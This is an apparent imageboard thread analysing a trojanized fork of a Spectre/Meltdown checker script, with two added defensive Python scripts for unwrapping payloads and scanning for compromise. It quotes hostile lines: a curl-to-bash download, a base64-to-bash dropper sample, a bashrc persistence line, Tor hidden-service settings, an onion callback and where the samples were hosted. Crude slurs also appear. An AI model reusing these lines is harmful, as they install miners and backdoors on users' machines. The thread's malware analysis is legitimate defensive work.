If you have executed this script, your computer is fucked

github.com/gonginnig/spectre-meltdown-checker
It looks like somebody is having fun sharing this fake script, controlling computers via ssh.

Is it related to this? Looks like a different author, allegedly.

guru3d.com/news-story/download-inspectre-meltdown-and-spectre-check-tool.html

>.sh
Can't run on Windows ;^)

How can someone be competent enough to install GNU/Linux and dumb enough to DOWNLOAD and more importantly RUN random bash scripts they find on the internet?

>WSL

A little extra investigation. See line 185, which decodes some base64 and pipes the result to bash. It's a simple curl command which grabs a script from a shortened URL and pipes THAT to bash. Request that URL and you'll get another lot of base64.

Decode /that/ and you'll see a script which first checks whether sudo works and then does yet ANOTHER base64 decryption dance. That new payload is the last layer, and it downloads a binary file and adds it to various shell profile files. I don't have the skills to analyse that binary, hopefully someone else will.
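An added example (not from the thread or the speed47 project) of unwrapping layers like the ones described above statically: each base64 run is decoded and searched for the next layer, and nothing is ever piped to bash. The three-layer sample in build_sample() is constructed to mirror the described structure and uses a placeholder URL.

```python
import base64
import binascii
import re

# Base64 runs long enough to be a payload rather than an incidental token.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Shell idioms worth flagging in each recovered layer.
SUSPICIOUS = ("base64 -d", "| bash", "| sh", "curl ", "wget ", "sudo ",
              ".bashrc", ".zshrc", "setsid ", "disown")

def _decode_text(blob):
    """Decode one base64 run; None unless it yields readable ASCII text."""
    try:
        text = base64.b64decode(blob, validate=True).decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return text if all(c.isprintable() or c in "\n\r\t" for c in text) else None

def unwrap(script, depth=0, max_depth=8):
    """(depth, text) for the script and every decodable layer nested in it.
    Nothing is executed: each layer is only decoded and searched for the next."""
    layers = [(depth, script)]
    if depth < max_depth:
        for match in B64_RE.finditer(script):
            inner = _decode_text(match.group(0))
            if inner is not None:
                layers.extend(unwrap(inner, depth + 1, max_depth))
    return layers

def flag(layers):
    """(depth, line) for every line in any layer containing a dropper idiom."""
    return [(d, line.strip()) for d, text in layers for line in text.splitlines()
            if any(tok in line for tok in SUSPICIOUS)]

def build_sample():
    """Constructed three-layer sample shaped like the thread's script (placeholder URL)."""
    b64 = lambda s: base64.b64encode(s.encode()).decode()
    inner = ("curl -s https://payload.example.invalid/x -o ~/.system/libexec\n"
             "echo 'setsid ~/.system/libexec > /dev/null 2> /dev/null& disown' >> ~/.bashrc\n")
    middle = "sudo -n true 2>/dev/null || exit 1\necho %s | base64 -d | bash\n" % b64(inner)
    return "#!/bin/sh\necho checking cpu flags\necho %s | base64 -d | bash\n" % b64(middle)

if __name__ == "__main__":
    for depth, line in flag(unwrap(build_sample())):
        print(f"[layer {depth}] {line}")
```

To look at a real script this way, fetch it to a file first and pass its text to unwrap() instead of piping it anywhere.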

Thank you for the explanation.
If I'm already patched, would this still work?

How is the binary file called?
try this
strings FILENAME | grep ssh
or
strings FILENAME | grep bash

yes

(Me)
I did have virustotal check out the file, and it seems to be a bitcoin miner. No idea whether it's an ssh backdoor too, as OP implies.

Patched for what?

github.com/speed47/spectre-meltdown-checker/compare/master...gonginnig:master

This is the real mystery user.

So you admit Linux is hard to install?

How?

For Meltdown and Spectre.

You don't need to be competent to install Linux distros. It's easier than installing Windows now.

Competent meaning they realize Windows is shit, not that the installation process is hard

>How?
Because it's not an exploit. You are giving the sudo privilege to do a set of encrypted commands. And it does not exploit spectre.

The only filename it has is the one from the shortened URL, "itxveb". sha256= 183d7c3b55fb82efd45963e0eed3adf33127bcf2f58a0322f51fd4ed49d874ad. I won't upload or link it but it shouldn't be hard to find if you really want.

Good call to grep the strings. No results for "ssh" directly, but sure enough, there's another base64'd bash payload in there. It downloads another binary. I'll investigate. Thanks

The script doesn't actually have anything to do with meltdown/spectre, it just pretends. So yes, you would be compromised regardless.

This script can be completely unrelated to Meltdown and Spectre despite its supposed intention

>gonginnig/spectre-meltdown-checker
The only site I even see "gonginnig" linked to is Sup Forums, meaning someone from here deliberately advertised it.

(Me)
The script downloads that second binary (actually more than one depending on whether systemd etc are available) and installs them as services.

Virustotal thinks both of these are clean. One of these is ssh related. The other is Tor (!!).

>meltdown image
cool descriptive stylized image
>spectre image(the more intricate exploit)
Gay cartoon ghost...
Guys what the fuck?

What's the base URL of the payload? There might be more goodies on the website found with a quick Google search. I am phoneposting.

It's a semi-popular filesharing site. (Think mediafire/mega, but smaller and which allows direct links).

>The other is Tor (!!)
Wtf? Why? what it does?

Oh well.

there's a fair few places where the instructions to install a program basically consist of "curl programname.com/install.sh | bash" or something of that nature, which then does all the steps for you
it's common enough, and most people can't be arsed to read the script before executing it, and in some cases, the script actually has a big 'ole binary attached to it directly (it's been ages, but I remember a proprietary program for Linux doing that, all the install files were bundled together and the header was a script to separate and install the rest)

would be no effort to make that malicious

it looks like it may also be installing a coin miner

I'm assuming it's to send/receive data to its cnc server untraceably. (Or, similarly, allow untraceable ssh access over tor).

>laugh at linux fags
>test run it just incase
>forgot i had Git for Windows, which can run .sh scripts
>it runs

Shit like this
brew.sh

Maybe "realizing Windows is shit" isn't such an elevated epiphany then, fag.

Those drawings were made by a woman..

go figure...

>most people can't be arsed to read the script before executing it

It's pretty easy to detect when curl is feeding directly to bash, and serve different content with a malicious payload. You can have a script that looks fine if you curl it and view it, but does something totally different if it is being piped into bash.

idontplaydarts.com/2016/04/detecting-curl-pipe-bash-server-side/

And yet, it's very easy to run things in a chroot sandbox before you rootkit your main install, retard.
Linux users are to the open source world what Windows users are to the proprietary world.

This.

A BSD user would've never fallen for this.

Hold my beer

The one who made the script was caught within minutes. Fuck off, faggot.

Here is:
my.mixtape.moe

Files are itxveb, mppzcd and vickyj.
Ex: my.mixtape.moe/itxveb
NEVER RUN UNLESS YOU ARE ON VM

We have no idea if someone was just browsing the catalog (so they can't read replies) and clicked the link and decided to run it

Why hasn't his account been banned yet?

I reported it. It would help if others did too, if you happen to have a github account.

Oh yeah, I see, the file is called mppzcd, renamed and moved to ~/.system/serviced.
It is executed with these args:
SOCKSPort 36955
DataDirectory .system/config
HiddenServiceDir /tmp/tmp-xgu
HiddenServicePort 42042 127.0.0.1:42042

Kek. That thread just won't die.

Tons of people probably did. Source: Zelda theme song threads

oof, hope you have recent backups

checked

HOW TO check if you are fucked
Check if the last line of the file ~/.bashrc and ~/.zshrc is:
setsid ~/.system/libexec > /dev/null 2> /dev/null& disown
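An added example (not from the thread) that turns the check above and the paths reported earlier in the thread (~/.system/serviced, ~/.system/config, the /tmp/tmp-xgu hidden-service dir) into one sweep; it looks at the whole of each profile file rather than only the last line, since the persistence line may not stay last.

```python
import re
from pathlib import Path

# The persistence line the thread reports at the end of ~/.bashrc and ~/.zshrc, matched
# loosely so that whitespace or redirection variations do not hide it.
PERSIST_RE = re.compile(r"setsid\s+\S*\.system/libexec.*disown")
PROFILE_FILES = (".bashrc", ".zshrc", ".profile", ".bash_profile", ".zprofile")
# Paths the thread names for the dropped binaries, tor state and hidden-service dir.
HOME_DROPS = (".system/libexec", ".system/serviced", ".system/config")
TMP_DROPS = ("/tmp/tmp-xgu",)

def scan_profile_text(name, text):
    """Findings for one profile file's contents (pure, so it is easy to test)."""
    findings = []
    for idx, line in enumerate(text.splitlines(), 1):
        if PERSIST_RE.search(line):
            findings.append(f"{name}:{idx}: persistence line: {line.strip()}")
        elif ".system/" in line or "base64 -d" in line:
            findings.append(f"{name}:{idx}: suspicious reference: {line.strip()}")
    return findings

def scan_home(home):
    """Findings for one home directory: profile files plus dropped paths."""
    findings = []
    for fname in PROFILE_FILES:
        path = home / fname
        if path.is_file():
            findings.extend(scan_profile_text(fname, path.read_text(errors="replace")))
    findings += [f"dropped path present: {home / rel}" for rel in HOME_DROPS if (home / rel).exists()]
    findings += [f"hidden-service dir present: {p}" for p in TMP_DROPS if Path(p).exists()]
    return findings

if __name__ == "__main__":
    # This only covers the invoking user's home; run it as root too, since the thread
    # reports the miner landing under root's .config when sudo succeeded.
    hits = scan_home(Path.home())
    print("\n".join(hits) if hits else "none of the indicators from this thread found")
```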

Don't worry user, the harm is done by way of native Linux binaries (elf). The bash code alone doesn't really do anything interesting or malicious, it's just an obfuscated downloader for those binaries.

kek but can you access it

>yes user, don't worry, your computer is not running botnet, just trust me

I was joking. I'm not THAT dumb.
I did run speed47's spectre-meltdown-checker.sh though to make sure .sh commands didn't run on Windows, and was pretty shocked to find out it did. I'll need to be careful.

also joking

>base64 decryption
Please never say those two words together in a sentence again unless you are saying "base64 is not cryptography". Because base64 is not cryptography

he probably meant obfuscation
easy mix up

># Check for the latest version at:
># github.com/speed47/spectre-meltdown-checker
he didn't change who the script is attributed to so the legit guy is more likely to be blamed

Not pictured: The ethernet cable plugged into his laptop because it's fucking impossible to get wifi working with Linux unless you're using a thinkpad from 2010

Hope this helps

What if he posts it on Sup Forums

True. I should have said "decoding" or "deobfuscation".

Steve Gibson from Security Now podcast recommended this script wtf

I peeked at its strings on the advice of another user and found more binaries, see
(Me)
(Me)

>built on Jan 10 2018 with GCC
Le C fag

Yeah, which is why I didn't call him a retard and tell him to kys.

But still, for anyone reading, encoding and encrypting are unrelated topics. GPG is encryption, where data is hidden behind an opaque cipher. Base64 is encoding, where data is plain text in a transparent different alphabet.

The repo in the OP is forked from a legitimate script.

Anyone reporting this repo to github should make this fact clear.

Crypto Miner that phones home with Tor
Pretty good setup, I'm impressed.

k3lwhvy5sl4q5dok.onion is the TOR address it phones home to

Already mentioned it in my report.
I hope that guy gets his ass fucking subpoenaed.

I'm more surprised it doesn't dump everything, a quick and dirty buttcoin miner will be found rapidly

if they're trying to mine bitcoins then they're a /biz/ faggot.

What does the file it curls do anyway? Even though I'm 99.999999% sure I could curl it safely if I don't pipe to bash like the script does I still don't wanna...

github.com/speed47/spectre-meltdown-checker/compare/master...gonginnig:master

this.
a miner is dumb.
they could've made a keylogger and stolen some poor Linux user's bank information.

Nah nothing will come of this other than it being deleted, the account on github is fresh so he'll have made it through a proxy.

All the more reason to hate fucking cryptopyramiders even harder.

Kys, retard.

Base 64 is encryption. It's just weak encryption.

You're objectively wrong.

Low quality bait, user. Try harder, I'd like a good shit flinging contest

>fork
I was shitting bricks for a moment there, even despite being fairly sure I skimmed through the original before running it to look for shit like that

Is there any software or tools I can run that automatically stop crypto miner?

If it's encryption, it must have an encryption key then. Care to tell me what's the key in this case?

Make one user

>yet again cryptography is used to perpetrate virtual crimes
Why haven't we banned encryption yet?

I can't, that's why I'm asking.
I find it pretty odd considering any pirated program can include a miner in it, and there'd be no way you'd know, especially if that program uses a high amount of CPU by default.

Unless it's like this thing and just driving your CPU to 100% and hoping you won't notice.

(Most linuxfags would notice)

nice find

There'd be no point in running a miner at 100% if you plan on having hundreds of thousands of users with it. More like 10%

Googling for AV's that offer crypto miner protection doesn't yield any results either.

Well I'm telling you what this one does. It drops its turd miner in root's .config if it can and the CPU shoots up to max.

Licucks on suicide watch

Most would indeed, I just found this pearl...

Pretty sure that user is joking

Base 64 is a cipher but it's not encryption

Yeah I checked the source and it downloads some shady ass shit.

>Goes to line 180.

Oh shit, Base64?! Wow, this is definitely not an attempt at some faggy code obfuscation that anyone can decode and figure out!

curl -s ix.io/EbA | bash -

Fucking kek.

>tfw didn't read thread before posting
I just assumed it would be 50 posts of you guys talking about nothing, sorry anons.

fuck you
what did you do?

The purpose of doing it with base64 is probably to stop high time preference morons quickly doing ^f curl or ^f bash and finding the line.

Oh no what ever will I do? It's not like I can be the plug, load up a Windows iso and delete everything.

if you actually ran that just relog/reboot/remove it if you put it in your bashrc or something

Looks like this is just a monero miner. The file that it downloads is the binary for 'xmrig'.

The binary has more base64 embedded.

>It's not like I can be the plug, load up a Windows iso and delete everything.
If nobody made this thread then how'd you know you ever had it?

That's the point.

itxveb seems to download & run a monero miner, also runs yet another script encoded with base64 (jesus fucking christ)

vickyj is a dropbear ssh binary, contains an ssh-rsa public key

mppzcd is a tor binary

probably does more, just some quick analysis of the strings

>dISOWN
>>>>DISOWN
>>DISOWN
BEING THIS RETARDED

I'm the owner of Mixtape, I just removed these files from access just now